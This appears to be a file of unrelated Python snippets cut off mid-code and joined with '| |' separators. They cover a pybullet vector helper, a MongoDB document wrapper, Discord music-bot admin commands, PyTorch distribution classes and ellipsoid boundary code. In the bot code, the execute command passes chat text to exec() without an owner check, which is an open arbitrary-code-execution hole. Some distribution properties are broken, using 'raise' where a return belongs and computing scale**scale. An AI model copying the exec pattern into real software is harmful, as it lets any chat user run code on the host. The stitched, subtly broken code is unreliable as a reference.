pitch = np.arcsin(-vector[2])
yaw = np.arctan2(vector[1], vector[0])
thickness = length/400
# The model of the vector mesures 170 units in the x axis (that explains
# the scaling for the x axis)
meshScale=[length/170,thickness,thickness]
visualShapeId = p.createVisualShape(
shapeType=p.GEOM_MESH,
fileName="giadog/assets/vector.obj", rgbaColor=[r,g,b,1],
specularColor=[0.4,.4,0], visualFramePosition=[0,0,0],
meshScale=meshScale
)
orientation = p.getQuaternionFromEuler([0, pitch, yaw])
vector = p.createMultiBody(
baseMass=0,
baseOrientation=orientation,
baseVisualShapeIndex = visualShapeId,
basePosition = r_o,
useMaximalCoordinates=False
)
return vector
def update_vector(self, vector_id: int, r_o: np.array, r_f: np.array):
"""
Update a vector.
Arguments:
----------
vector_id: int
Vector ID.
r_o: numpy.array, shape (3,)
Origin of the vector.
r_f: numpy.array, shape (3,)
| |
import functools
from copy import deepcopy
from typing import List, Dict, Optional, Union, Any, TypeVar, Type
from motor.motor_asyncio import AsyncIOMotorDatabase, AsyncIOMotorCollection
from pymongo.results import DeleteResult
T = TypeVar("T")
def return_converted(func):
"""
If we have a registered converter,
this deco will attempt to parse
the given data into our provided
class through the use of dictionary unpacking.
"""
@functools.wraps(func)
async def wrapped(*args, **kwargs):
data: Union[Dict, List[Dict]] = await func(*args, **kwargs)
self: Document = args[0]
if not data or not self.converter:
return data
if not isinstance(data, list):
return self.converter(**data)
new_data = []
for d in data:
new_data.append(self.converter(**d))
return new_data
return wrapped
class Document:
_version = 9.1
def __init__(
self,
database: AsyncIOMotorDatabase,
document_name: str,
converter: Optional[Type[T]] = None,
):
"""
Parameters
----------
database: AsyncIOMotorDatabase
The database we are connected to
document_name: str
What this _document should be called
converter: Optional[Type[T]]
An optional converter to try
convert all data-types which
return either Dict or List into
"""
self._document_name: str = document_name
self._database: AsyncIOMotorDatabase = database
self._document: AsyncIOMotorCollection = database[document_name]
self.converter: Type[T] = converter
def __repr__(self):
return f"<Document(document_name={self.document_name})>"
# <-- Pointer Methods -->
async def find(
self, filter_dict: Union[Dict, Any]
) -> Optional[Union[Dict[str, Any], Type[T]]]:
"""
Find and return one item.
Parameters
----------
filter_dict: Union[Dict, Any]
The _id of the item to find,
if a Dict is passed that is
used as the filter.
Returns
-------
Optional[Union[Dict[str, Any], Type[T]]]
The result of the query
"""
filter_dict = self.__convert_filter(filter_dict)
return await self.find_by_custom(filter_dict)
async def delete(self, filter_dict: Union[Dict, Any]) -> Optional[DeleteResult]:
"""
Delete an item from the Document
if an item with that _id exists
Parameters
----------
filter_dict: Union[Dict, Any]
The _id of the item to delete,
if a Dict is passed that is
used as the filter.
Returns
-------
DeleteResult
The result of deletion
"""
filter_dict = self.__convert_filter(filter_dict)
return await self.delete_by_custom(filter_dict)
async def update(
self,
filter_dict: Union[Dict, Any],
data: Dict[str, Any] = None,
*args: Any,
**kwargs: Any,
) -> None:
"""
Update an existing _document within the database
Parameters
----------
filter_dict: Union[Dict, Any]
The _id of the item to update by,
if a Dict is passed that is
used as the filter.
data: Dict[str, Any]
The data we want to update with
"""
filter_dict = self.__convert_filter(filter_dict)
if data is None:
# Backwards compat so you can just pass something like
# await doc.upsert({"_id": 1, "data": False})
data = deepcopy(filter_dict)
filter_dict = self.__convert_filter(data.pop("_id"))
await self.update_by_custom(filter_dict, data, *args, **kwargs)
# <-- Actual Methods -->
@return_converted
async def get_all(
self, filter_dict: Optional[Dict[str, Any]] = None, *args: Any, **kwargs: Any
) -> List[Optional[Union[Dict[str, Any], Type[T]]]]:
"""
Fetches and returns all items
which match the given filter.
Parameters
----------
filter_dict: Optional[Dict[str, Any]]
What to filter based on
Returns
-------
List[Optional[Union[Dict[str, Any], Type[T]]]]
The items matching the filter
"""
filter_dict = filter_dict or {}
return await self._document.find(filter_dict, *args, **kwargs).to_list(None)
@return_converted
async def get_all_where_field_exists(
self, field: Any, where_field_doesnt_exist: bool = False
) -> List[Optional[Union[Dict[str, Any], Type[T]]]]:
"""
Return all of the documents which
contain the key given by `field`
Parameters
----------
field: Any
The field to match by
where_field_doesnt_exist: bool, Optional
If this is ``True``, then this method
will return all the documents without
the key denoted by `field`.
Essentially the opposite of whats documented
in the main doc description.
Defaults to ``False``
Returns
-------
"""
existence = not where_field_doesnt_exist
return await self._document.find({field: {"$exists": existence}}).to_list(None)
@return_converted
async def find_by_id(
self, data_id: Any
) -> Optional[Union[Dict[str, Any], Type[T]]]:
"""
Find and return one item.
Parameters
----------
data_id: Any
The _id of the item to find
Returns
-------
Optional[Union[Dict[str, Any], Type[T]]]
The result of the query
"""
return await self.find_by_custom({"_id": data_id})
@return_converted
async def find_by_custom(
self, filter_dict: Dict[str, Any]
) -> Optional[Union[Dict[str, Any], Type[T]]]:
"""
Find and return one item.
Parameters
----------
filter_dict: Dict[str, Any]
What to filter/find based on
Returns
-------
Optional[Union[Dict[str, Any], Type[T]]]
The result of the query
"""
self.__ensure_dict(filter_dict)
return await self._document.find_one(filter_dict)
@return_converted
async def find_many_by_custom(
self, filter_dict: Dict[str, Any]
) -> List[Union[Dict[str, Any], Type[T]]]:
"""
Find and return all items
matching the given filter
Parameters
----------
filter_dict: Dict[str, Any]
What to filter/find based on
Returns
-------
List[Union[Dict[str, Any], Type[T]]]
The result of the query
"""
self.__ensure_dict(filter_dict)
return await self._document.find(filter_dict).to_list(None)
async def delete_by_id(self, data_id: Any) -> Optional[DeleteResult]:
"""
Delete an item from the Document
if an item with that _id exists
Parameters
----------
data_id: Any
The _id to delete
Returns
-------
DeleteResult
The result of deletion
"""
return await self.delete_by_custom({"_id": data_id})
async def delete_by_custom(
self, filter_dict: Dict[str, Any]
) -> Optional[DeleteResult]:
"""
Delete an item from the Document
matching the filter
Parameters
----------
filter_dict: Any
Delete items matching this
dictionary
Returns
-------
DeleteResult
The result of deletion
"""
self.__ensure_dict(filter_dict)
result: DeleteResult = await self._document.delete_many(filter_dict)
result: Optional[DeleteResult] = result if result.deleted_count != 0 else None
return result
async def insert(self, data: Dict[str, Any]) -> None:
"""
Insert the given data into the _document
Parameters
----------
data: Dict[str, Any]
The data to insert
"""
self.__ensure_dict(data)
await self._document.insert_one(data)
async def upsert(
self,
filter_dict: Union[Dict, Any],
data: Dict[str, Any] = None,
option: str = "set",
*args: Any,
**kwargs: Any,
) -> None:
"""
Performs an UPSERT operation,
so data is either INSERTED or UPDATED
based on the current state of the _document.
Parameters
----------
filter_dict: Union[Dict, Any]
The _id of the item to update by,
if a Dict is passed that is
used as the filter.
data: Dict[str, Any]
The data to upsert (filter is _id)
option: str
The optional option to pass to mongo,
default is set
"""
# Fairly sure this is no longer needed
# if await self.find_by_id(data["_id"]) is None:
# return await self.insert(data)
filter_dict = self.__convert_filter(filter_dict)
if data is None:
# Backwards compat so you can just pass something like
# await doc.upsert({"_id": 1, "data": False})
data = deepcopy(filter_dict)
filter_dict = self.__convert_filter(data.pop("_id"))
await self.upsert_custom(filter_dict, data, option, *args, **kwargs)
async def update_by_id(
self, data: Dict[str, Any], option: str = "set", *args: Any, **kwargs: Any
) -> None:
"""
Performs an update operation.
Parameters
----------
data: Dict[str, Any]
The data to upsert (filter is _id)
option: str
The optional option to pass to mongo,
default is set
Notes
-----
If the data doesn't already
exist, this makes no changes
to the actual database.
"""
self.__ensure_dict(data)
self.__ensure_id(data)
data_id = data.pop("_id")
await self._document.update_one(
{"_id": data_id}, {f"${option}": data}, *args, **kwargs
)
async def upsert_custom(
self,
filter_dict: Dict[str, Any],
update_data: Dict[str, Any],
option: str = "set",
*args: Any,
**kwargs: Any,
) -> None:
"""
Performs an UPSERT operation,
so data is either INSERTED or UPDATED
based on the current state of the _document.
Uses filter_dict rather then _id
Parameters
----------
filter_dict: Dict[str, Any]
The data to filter on
update_data: Dict[str, Any]
The data to upsert
option: str
The optional option to pass to mongo,
default is set
"""
await self.update_by_custom(
filter_dict, update_data, option, upsert=True, *args, **kwargs
)
async def update_by_custom(
self,
filter_dict: Dict[str, Any],
update_data: Dict[str, Any],
option: str = "set",
*args: Any,
**kwargs: Any,
) -> None:
"""
Performs an update operation.
Parameters
----------
filter_dict: Dict[str, Any]
The data to filter on
update_data: Dict[str, Any]
The data to upsert
option: str
The optional option to pass to mongo,
default is set
"""
self.__ensure_dict(filter_dict)
self.__ensure_dict(update_data)
# Update
await self._document.update_one(
filter_dict, {f"${option}": update_data}, *args, **kwargs
)
async def unset(self, _id: Union[Dict, Any], field: Any) -> None:
"""
Remove a given param, basically dict.pop on the db.
Works based off _id
Parameters
----------
_id: Any
The field's _document id or
dict as a filter
field: Any
The field to remove
"""
filter_dict = self.__convert_filter(_id)
await self.unset_by_custom(filter_dict, field)
async def unset_by_custom(self, filter_dict: Dict[str, Any], field: Any) -> None:
"""
Remove a given param, basically dict.pop on the db.
Works based off _id
Parameters
----------
filter_dict: Dict[str, Any]
The fields to match on (Think _id)
field: Any
The field to remove
"""
self.__ensure_dict(filter_dict)
await self._document.update_one(filter_dict, {"$unset": {field: True}})
async def increment(
self, data_id: Union[Dict, Any], amount: Union[int, float], field: | |
import traceback
from contextlib import redirect_stdout
from io import BytesIO, StringIO
from textwrap import indent
import aiohttp
import discord
from musicbot import exceptions
from musicbot.settings import Settings
from musicbot.utils import Response, command_info, escape_dis, owner_only
class AdminCommands:
async def cmd_blacklist(self, message, user_mentions, option, something):
"""
///|Usage
{command_prefix}blacklist [ + | - | add | remove ] @UserName [@UserName2 ...]
///|Explanation
Add or remove users to the blacklist.
"""
if not user_mentions:
raise exceptions.CommandError("No users listed.", expire_in=20)
if option not in ["+", "-", "add", "remove"]:
raise exceptions.CommandError(
"Invalid option \" % s\" specified, use +, -, add, or remove" %
option)
for user in user_mentions.copy():
if user.id == self.config.owner_id:
print(
"[Commands:Blacklist] The owner cannot be blacklisted.")
user_mentions.remove(user)
old_len = len(self.blacklist)
if option in ["+", "add"]:
self.blacklist.update(user.id for user in user_mentions)
write_file(self.config.blacklist_file, self.blacklist)
return Response(
"%s users have been added to the blacklist" %
(len(self.blacklist) - old_len),
reply=True)
else:
if self.blacklist.isdisjoint(user.id for user in user_mentions):
return Response(
"none of those users are in the blacklist.",
reply=True)
else:
self.blacklist.difference_update(user.id
for user in user_mentions)
write_file(self.config.blacklist_file, self.blacklist)
return Response(
"%s users have been removed from the blacklist" %
(old_len - len(self.blacklist)),
reply=True)
async def cmd_id(self, author, user_mentions):
"""
///|Usage
{command_prefix}id [@user]
///|Explanation
Tells the user their id or the id of another user.
"""
if not user_mentions:
return Response(
"your id is `%s`" % author.id, reply=True)
else:
usr = user_mentions[0]
return Response(
"%s's id is `%s`" % (usr.name, usr.id),
reply=True)
@owner_only
async def cmd_joinserver(self, message, server_link=None):
"""
Usage:
{command_prefix}joinserver invite_link
Asks the bot to join a server. Note: Bot accounts cannot use invite links.
"""
if self.user.bot:
url = await self.generate_invite_link()
return Response(
"Bot accounts can't use invite links! Click here to invite me: \n{}".
format(url),
reply=True,
delete_after=30)
try:
if server_link:
await self.accept_invite(server_link)
return Response(":+1:")
except:
raise exceptions.CommandError(
"Invalid URL provided:\n{}\n".format(server_link))
async def cmd_listids(self, server, author, leftover_args, cat="all"):
"""
Usage:
{command_prefix}listids [categories]
Lists the ids for various things. Categories are:
all, users, roles, channels
"""
cats = ["channels", "roles", "users"]
if cat not in cats and cat != "all":
return Response(
"Valid categories: " + " ".join(["`%s`" % c for c in cats]),
reply=True,
delete_after=25)
if cat == "all":
requested_cats = cats
else:
requested_cats = [cat] + [c.strip(",") for c in leftover_args]
data = ["Your ID: %s" % author.id]
for cur_cat in requested_cats:
rawudata = None
if cur_cat == "users":
data.append("\nUser IDs:")
rawudata = [
"%s #%s: %s" % (m.name, m.discriminator, m.id)
for m in server.members
]
elif cur_cat == "roles":
data.append("\nRole IDs:")
rawudata = ["%s: %s" % (r.name, r.id) for r in server.roles]
elif cur_cat == "channels":
data.append("\nText Channel IDs:")
tchans = [
c for c in server.channels
if c.type == discord.ChannelType.text
]
rawudata = ["%s: %s" % (c.name, c.id) for c in tchans]
rawudata.append("\nVoice Channel IDs:")
vchans = [
c for c in server.channels
if c.type == discord.ChannelType.voice
]
rawudata.extend("%s: %s" % (c.name, c.id) for c in vchans)
if rawudata:
data.extend(rawudata)
with BytesIO() as sdata:
sdata.writelines(d.encode("utf8") + b"\n" for d in data)
sdata.seek(0)
await self.send_file(
author,
sdata,
filename="%s-ids-%s.txt" % (server.name.replace(" ", "_"),
cat))
return Response(":mailbox_with_mail:")
@owner_only
async def cmd_setname(self, leftover_args, name):
"""
Usage:
{command_prefix}setname name
Changes the bot's username.
Note: This operation is limited by discord to twice per hour.
"""
name = " ".join([name, *leftover_args])
try:
await self.edit_profile(username=name)
except Exception as e:
raise exceptions.CommandError(e, expire_in=20)
return Response(":ok_hand:")
@owner_only
async def cmd_setnick(self, server, channel, leftover_args, nick):
"""
Usage:
{command_prefix}setnick nick
Changes the bot's nickname.
"""
if not channel.permissions_for(server.me).change_nickname:
raise exceptions.CommandError(
"Unable to change nickname: no permission.")
nick = " ".join([nick, *leftover_args])
try:
await self.change_nickname(server.me, nick)
except Exception as e:
raise exceptions.CommandError(e, expire_in=20)
return Response(":ok_hand:")
@owner_only
async def cmd_setavatar(self, message, url=None):
"""
Usage:
{command_prefix}setavatar [url]
Changes the bot's avatar.
Attaching a file and leaving the url parameter blank also works.
"""
if message.attachments:
thing = message.attachments[0]["url"]
else:
thing = url.strip("<>")
try:
with aiohttp.Timeout(10):
async with self.aiosession.get(thing) as res:
await self.edit_profile(avatar=await res.read())
except Exception as e:
raise exceptions.CommandError(
"Unable to change avatar: %s" % e, expire_in=20)
return Response(":ok_hand:")
async def cmd_clean(self, message, channel, server, author, search_range=50):
"""
Usage:
{command_prefix}clean [range]
Removes up to [range] messages the bot has posted in chat. Default: 50, Max: 1000
"""
try:
search_range = min(int(search_range) + 1, 1000)
except:
return Response(
"enter a number. NUMBER. That means digits. `15`. Etc.",
reply=True)
await self.safe_delete_message(message, quiet=True)
def is_possible_command_invoke(entry):
valid_call = any(
entry.content.startswith(prefix)
for prefix in [self.config.command_prefix]) # can be expanded
return valid_call and not entry.content[1:2].isspace()
delete_invokes = True
delete_all = channel.permissions_for(
author).manage_messages or self.config.owner_id == author.id
def check(message):
if is_possible_command_invoke(message) and delete_invokes:
return delete_all or message.author == author
return message.author == self.user
if self.user.bot:
if channel.permissions_for(server.me).manage_messages:
deleted = await self.purge_from(
channel, check=check, limit=search_range, before=message)
return Response(
"Cleaned up {} message{}.".format(
len(deleted), "s" * bool(deleted)))
deleted = 0
async for entry in self.logs_from(
channel, search_range, before=message):
if entry == self.server_specific_data[channel.server][
"last_np_msg"]:
continue
if entry.author == self.user:
await self.safe_delete_message(entry)
deleted += 1
await asyncio.sleep(0.21)
if is_possible_command_invoke(entry) and delete_invokes:
if delete_all or entry.author == author:
try:
await self.delete_message(entry)
await asyncio.sleep(0.21)
deleted += 1
except discord.Forbidden:
delete_invokes = False
except discord.HTTPException:
pass
return Response(
"Cleaned up {} message{}.".format(deleted, "s" * bool(deleted)))
async def cmd_say(self, channel, message, leftover_args):
"""
Usage:
{command_prefix}say <message>
Make the bot say something
"""
await self.safe_delete_message(message)
await self.safe_send_message(channel, " ".join(leftover_args))
print(message.author.name + " made me say: \"" +
" ".join(leftover_args) + "\"")
async def cmd_broadcast(self, server, message, leftover_args):
"""
Usage:
{command_prefix}broadcast message
Broadcast a message to every user of the server
"""
targetMembers = []
msg = ""
if len(message.mentions) > 0:
print("Found mentions!")
msg = " ".join(leftover_args[len(message.mentions):])
for target in message.mentions:
print("User " + str(target) + " added to recipients")
targetMembers.append(target)
for role in server.roles:
if role.name == leftover_args[0] or role.id == leftover_args[0]:
print("Found " + role.name +
" and will send the message to them")
msg = " ".join(leftover_args[1:])
for member in server.members:
for mRole in member.roles:
if member not in targetMembers and (
mRole.name == leftover_args[0] or
mRole.id == leftover_args[0]):
print("User " + str(member) +
" added to recipients")
targetMembers.append(member)
break
break
if len(targetMembers) < 1:
print(
"Didn't find a recipient. Will send the message to everyone")
targetMembers = server.members
msg = " ".join(leftover_args)
for m in targetMembers:
if m.bot:
continue
print("Sent \"" + msg + "\" to " + str(m))
await self.safe_send_message(m, msg)
@owner_only
@command_info("3.1.6", 1498672140, {
"3.6.4": (1498146841, "Can now specify the required arguments in order to block a command"),
"3.9.8": (1499976133, "Saving the blocked commands")
})
async def cmd_blockcommand(self, command, leftover_args):
"""
///|Usage
`{command_prefix}blockcommand <command> [args] <"reason">`
///|Explanation
Block a command
"""
if command.lower() in self.blocked_commands:
self.blocked_commands.pop(command.lower())
Settings["blocked_commands"] = self.blocked_commands
return Response("Block lifted")
else:
if len(leftover_args) < 1:
return Response("Reason plz")
args = []
for i, el in enumerate(leftover_args):
if not el.startswith("\""):
args.append(el)
else:
reason = " ".join(leftover_args[i:]).strip("\"")
break
if not reason:
return Response("Put your reason in quotes, idiot!")
self.blocked_commands[command.lower()] = (args, reason)
Settings["blocked_commands"] = self.blocked_commands
return Response("Blocked command `{} {}`".format(command, " ".join(args)))
@command_info("2.0.2", 1484676180, {
"3.8.3": (1499184914, "Can now use multiline statements without having to use tricks like /n/"),
"3.8.5": (1499279145, "Better code display"),
"3.9.6": (1499889309, "Escaping the result and adding the shortcut entry for player.current_entry"),
"4.3.4": (1501246003, "Don't block user anymore. That's stupid"),
"4.4.7": (1501683507, "Not showing empty result message"),
"4.4.8": (1501684956, "including the console log"),
"4.5.2": (1501965475, "only showing console log when it contains something")
})
async def cmd_execute(self, channel, author, server, raw_content, player=None):
statement = raw_content.strip()
beautiful_statement = "```python\n{}\n```".format(statement)
statement = "async def func():\n{}".format(indent(statement, "\t"))
await self.safe_send_message(channel, "**RUNNING CODE**\n{}".format(beautiful_statement))
env = {}
env.update(globals())
env.update(locals())
env.update(entry=player.current_entry)
console = StringIO()
try:
exec(statement, env)
except SyntaxError as e:
return Response(
"**While compiling the statement the following error occured**\n{}\n{}".
format(traceback.format_exc(), str(e)))
func = env["func"]
try:
with redirect_stdout(console):
ret = await func()
except Exception as e:
return Response(
"**While executing the statement the following error occured**\n{}\n{}".
format(traceback.format_exc(), str(e)))
res = escape_dis(str(ret))
if ret is not None and res:
result = "**RESULT**\n{}".format(res)
else:
result = ""
log = console.getvalue().strip()
| |
<= 1`, where
a value of 0 gives an undamped random walk and a value of 1 gives
uncorrelated Gaussian noise. Hence in most applications a small
non-zero value is appropriate.
stddev (float): Standard deviation of the Gaussian component.
"""
super(OUProcess, self).__init__()
self._damping = damping
self._stddev = stddev
self._x = initial_value.clone().detach()
def forward(self):
noise = torch.randn_like(self._x) * self._stddev
return self._x.data.copy_((1 - self._damping) * self._x + noise)
class DiagMultivariateNormal(td.Independent):
def __init__(self, loc, scale):
"""Create multivariate normal distribution with diagonal variance.
Args:
loc (Tensor): mean of the distribution
scale (Tensor): standard deviation. Should have same shape as ``loc``.
"""
# set validate_args to False here to enable the construction of Normal
# distribution with zero scale.
super().__init__(
td.Normal(loc, scale, validate_args=False),
reinterpreted_batch_ndims=1)
@property
def stddev(self):
return self.base_dist.stddev
@alf.configurable(whitelist=['eps'])
class Beta(td.Beta):
r"""Beta distribution parameterized by ``concentration1`` and ``concentration0``.
Note: we need to wrap ``td.Beta`` so that ``self.concentration1`` and
``self.concentration0`` are the actual tensors passed in to construct the
distribution. This is important in certain situation. For example, if you want
to register a hook to process the gradient to ``concentration1`` and ``concentration0``,
``td.Beta.concentration0.register_hook()`` will not work because gradient will
not be backpropped to ``td.Beta.concentration0`` since it is sliced from
``td.Dirichlet.concentration`` and gradient will only be backpropped to
``td.Dirichlet.concentration`` instead of ``td.Beta.concentration0`` or
``td.Beta.concentration1``.
"""
def __init__(self,
concentration1,
concentration0,
eps=None,
validate_args=None):
"""
Args:
concentration1 (float or Tensor): 1st concentration parameter of the distribution
(often referred to as alpha)
concentration0 (float or Tensor): 2nd concentration parameter of the distribution
(often referred to as beta)
eps (float): a very small value indicating the interval ``[eps, 1-eps]``
into which the sampled values will be clipped. This clipping can
prevent ``NaN`` and ``Inf`` values in the gradients. If None,
a small value defined by PyTorch will be used.
"""
self._concentration1 = concentration1
self._concentration0 = concentration0
super().__init__(concentration1, concentration0, validate_args)
if eps is None:
self._eps = torch.finfo(self._dirichlet.concentration.dtype).eps
else:
self._eps = float(eps)
@property
def concentration0(self):
return self._concentration0
@property
def concentration1(self):
return self._concentration1
def rsample(self, sample_shape=()):
"""We override the original ``rsample()`` in order to clamp the output
to avoid `NaN` and `Inf` values in the gradients. See Pyro's
``rsample()`` implementation in
`<https://docs.pyro.ai/en/dev/_modules/pyro/distributions/affine_beta.html#AffineBeta>`_.
"""
x = super(Beta, self).rsample(sample_shape)
return torch.clamp(x, min=self._eps, max=1 - self._eps)
class DiagMultivariateBeta(td.Independent):
def __init__(self, concentration1, concentration0):
"""Create multivariate independent beta distribution.
Args:
concentration1 (float or Tensor): 1st concentration parameter of the
distribution (often referred to as alpha)
concentration0 (float or Tensor): 2nd concentration parameter of the
distribution (often referred to as beta)
"""
super().__init__(
Beta(concentration1, concentration0), reinterpreted_batch_ndims=1)
class AffineTransformedDistribution(td.TransformedDistribution):
r"""Transform via the pointwise affine mapping :math:`y = \text{loc} + \text{scale} \times x`.
The reason of not using ``td.TransformedDistribution`` is that we can implement
``entropy``, ``mean``, ``variance`` and ``stddev`` for ``AffineTransforma``.
"""
def __init__(self, base_dist: td.Distribution, loc, scale):
"""
Args:
loc (Tensor or float): Location parameter.
scale (Tensor or float): Scale parameter.
"""
super().__init__(
base_distribution=base_dist,
transforms=AffineTransform(loc, scale))
self.loc = loc
self.scale = scale
# broadcase scale to event_shape if necessary
s = torch.ones(base_dist.event_shape) * scale
self._log_abs_scale = s.abs().log().sum()
def entropy(self):
"""Returns entropy of distribution, batched over batch_shape.
Returns:
Tensor of shape batch_shape.
"""
return self._log_abs_scale + self.base_dist.entropy()
@property
def mean(self):
"""Returns the mean of the distribution."""
return self.scale * self.base_dist.mean() + self.loc
@property
def variance(self):
"""Returns the variance of the distribution."""
raise self.scale**self.scale * self.base_dist.variance()
@property
def stddev(self):
"""Returns the variance of the distribution."""
raise self.scale * self.base_dist.stddev()
class StableCauchy(td.Cauchy):
def rsample(self, sample_shape=torch.Size(), clipping_value=0.49):
r"""Overwrite Pytorch's Cauchy rsample for a more stable result. Basically
the sampled number is clipped to fall within a reasonable range.
For reference::
> np.tan(math.pi * -0.499)
-318.30883898554157
> np.tan(math.pi * -0.49)
-31.820515953773853
Args:
clipping_value (float): suppose eps is sampled from ``(-0.5,0.5)``.
It will be clipped to ``[-clipping_value, clipping_value]`` to
avoid values with huge magnitudes.
"""
shape = self._extended_shape(sample_shape)
eps = self.loc.new(shape).uniform_()
eps = torch.clamp(eps - 0.5, min=-clipping_value, max=clipping_value)
return torch.tan(eps * math.pi) * self.scale + self.loc
class DiagMultivariateCauchy(td.Independent):
def __init__(self, loc, scale):
"""Create multivariate cauchy distribution with diagonal scale matrix.
Args:
loc (Tensor): median of the distribution. Note that Cauchy doesn't
have a mean (divergent).
scale (Tensor): also known as "half width". Should have the same
shape as ``loc``.
"""
super().__init__(StableCauchy(loc, scale), reinterpreted_batch_ndims=1)
@property
def loc(self):
return self.base_dist.loc
@property
def scale(self):
return self.base_dist.scale
def _builder_independent(base_builder, reinterpreted_batch_ndims_, **kwargs):
return td.Independent(base_builder(**kwargs), reinterpreted_batch_ndims_)
def _builder_transformed(base_builder, transforms_, **kwargs):
return td.TransformedDistribution(base_builder(**kwargs), transforms_)
def _get_categorical_builder(obj: td.Categorical):
if 'probs' in obj.__dict__ and id(obj.probs) == id(obj._param):
# This means that obj is constructed using probs
return td.Categorical, {'probs': obj.probs}
else:
return td.Categorical, {'logits': obj.logits}
def _get_independent_builder(obj: td.Independent):
builder, params = _get_builder(obj.base_dist)
new_builder = functools.partial(_builder_independent, builder,
obj.reinterpreted_batch_ndims)
return new_builder, params
def _get_transformed_builder(obj: td.TransformedDistribution):
builder, params = _get_builder(obj.base_dist)
new_builder = functools.partial(_builder_transformed, builder,
obj.transforms)
return new_builder, params
def _builder_affine_transformed(base_builder, loc_, scale_, **kwargs):
# 'loc' and 'scale' may conflict with the names in kwargs. So we add suffix '_'.
return AffineTransformedDistribution(base_builder(**kwargs), loc_, scale_)
def _get_affine_transformed_builder(obj: AffineTransformedDistribution):
builder, params = _get_builder(obj.base_dist)
new_builder = functools.partial(_builder_affine_transformed, builder,
obj.loc, obj.scale)
return new_builder, params
_get_builder_map = {
td.Categorical:
_get_categorical_builder,
td.Normal:
lambda obj: (td.Normal, {
'loc': obj.mean,
'scale': obj.stddev
}),
StableCauchy:
lambda obj: (StableCauchy, {
'loc': obj.loc,
'scale': obj.scale
}),
td.Independent:
_get_independent_builder,
DiagMultivariateNormal:
lambda obj: (DiagMultivariateNormal, {
'loc': obj.mean,
'scale': obj.stddev
}),
DiagMultivariateCauchy:
lambda obj: (DiagMultivariateCauchy, {
'loc': obj.loc,
'scale': obj.scale
}),
td.TransformedDistribution:
_get_transformed_builder,
AffineTransformedDistribution:
_get_affine_transformed_builder,
Beta:
lambda obj: (Beta, {
'concentration1': obj.concentration1,
'concentration0': obj.concentration0
}),
DiagMultivariateBeta:
lambda obj: (DiagMultivariateBeta, {
'concentration1': obj.base_dist.concentration1,
'concentration0': obj.base_dist.concentration0
}),
}
def _get_builder(obj):
return _get_builder_map[type(obj)](obj)
def extract_distribution_parameters(dist: td.Distribution):
"""Extract the input parameters of a distribution.
Args:
dist (Distribution): distribution from which to extract parameters
Returns:
the nest of the input parameter of the distribution
"""
return _get_builder(dist)[1]
class DistributionSpec(object):
def __init__(self, builder, input_params_spec):
"""
Args:
builder (Callable): the function which is used to build the
distribution. The returned value of ``builder(input_params)``
is a ``Distribution`` with input parameter as ``input_params``.
input_params_spec (nested TensorSpec): the spec for the argument of
``builder``.
"""
self.builder = builder
self.input_params_spec = input_params_spec
def build_distribution(self, input_params):
"""Build a Distribution using ``input_params``.
Args:
input_params (nested Tensor): the parameters for build the
distribution. It should match ``input_params_spec`` provided as
``__init__``.
Returns:
Distribution:
"""
nest.assert_same_structure(input_params, self.input_params_spec)
return self.builder(**input_params)
@classmethod
def from_distribution(cls, dist, from_dim=0):
"""Create a ``DistributionSpec`` from a ``Distribution``.
Args:
dist (Distribution): the ``Distribution`` from which the spec is
extracted.
from_dim (int): only use the dimenions from this. The reason of
using ``from_dim>0`` is that ``[0, from_dim)`` might be batch
dimension in some scenario.
Returns:
DistributionSpec:
"""
builder, input_params = _get_builder(dist)
input_param_spec = extract_spec(input_params, from_dim)
return cls(builder, input_param_spec)
def extract_spec(nests, from_dim=1):
"""
Extract ``TensorSpec`` or ``DistributionSpec`` for each element of a nested
structure. It assumes that the first dimension of each element is the batch
size.
Args:
nests (nested structure): each leaf node of the nested structure is a
Tensor or Distribution of the same batch size.
from_dim (int): ignore dimension before this when constructing the spec.
Returns:
nest: each leaf node of the returned nested spec is the corresponding
spec (excluding batch size) of the element of ``nest``.
"""
def _extract_spec(obj):
if isinstance(obj, torch.Tensor):
return TensorSpec.from_tensor(obj, from_dim)
elif isinstance(obj, td.Distribution):
return DistributionSpec.from_distribution(obj, from_dim)
else:
raise ValueError("Unsupported value type: %s" % type(obj))
return nest.map_structure(_extract_spec, nests)
def to_distribution_param_spec(nests):
"""Convert the ``DistributionSpecs`` in nests to their parameter specs.
Args:
nests (nested DistributionSpec of TensorSpec): Each ``DistributionSpec``
will be converted to a dictionary of the spec of its input ``Tensor``
parameters.
Returns:
nested TensorSpec: Each leaf is a ``TensorSpec`` or a ``dict``
corresponding to one distribution, with keys as parameter name and
values as ``TensorSpecs`` for the parameters.
"""
def _to_param_spec(spec):
if isinstance(spec, DistributionSpec):
return spec.input_params_spec
elif isinstance(spec, TensorSpec):
return spec
else:
raise ValueError("Only TensorSpec or DistributionSpec is allowed "
"in nest, got %s. nest is %s" % (spec, nests))
return nest.map_structure(_to_param_spec, nests)
def params_to_distributions(nests, nest_spec):
"""Convert distribution parameters to ``Distribution``, keep tensors unchanged.
Args:
nests (nested Tensor): a nested ``Tensor`` and dictionary of tensor
parameters of ``Distribution``. Typically, ``nest`` is obtained using
``distributions_to_params()``.
nest_spec (nested DistributionSpec and TensorSpec): The distribution
params will be converted to ``Distribution`` according to the
corresponding ``DistributionSpec`` in | |
self.y)
self.y = sim_box.bottom - diff
if self.z > sim_box.back:
diff = self.z - sim_box.back
self.z = sim_box.front + diff
elif self.z < sim_box.front:
diff = abs(sim_box.front - self.z)
self.z = sim_box.back - diff
self.set_cub() # update the bounding box due to its movement
# Now its inside: Check which face the particle collides with
left = True if self.bbox_xmin < sim_box.left else False
top = True if self.bbox_ymin < sim_box.top else False
front = True if self.bbox_zmin < sim_box.front else False
right = True if self.bbox_xmax > sim_box.right else False
bottom = True if self.bbox_ymax > sim_box.bottom else False
back = True if self.bbox_zmax > sim_box.back else False
sim_width = abs(sim_box.right - sim_box.left)
sim_height = abs(sim_box.bottom - sim_box.top)
sim_depth = abs(sim_box.back - sim_box.front)
# If it collides with any three faces: Create 7 duplicates
if sum([left, top, right, bottom, front, back]) == 3:
if left and top and front:
p1 = Ellipsoid(str(self.id)+'_RTF', self.x+sim_width, self.y,
self.z, self.a, self.b, self.c, self.quat)
p2 = Ellipsoid(str(self.id)+'_RBF', self.x+sim_width, self.y +
sim_height, self.z, self.a, self.b, self.c, self.quat)
p3 = Ellipsoid(str(self.id)+'_LBF', self.x, self.y +
sim_height, self.z, self.a, self.b, self.c, self.quat)
p4 = Ellipsoid(str(self.id)+'_LTB', self.x, self.y,
self.z+sim_depth, self.a, self.b, self.c, self.quat)
p5 = Ellipsoid(str(self.id)+'_RTB', self.x+sim_width, self.y,
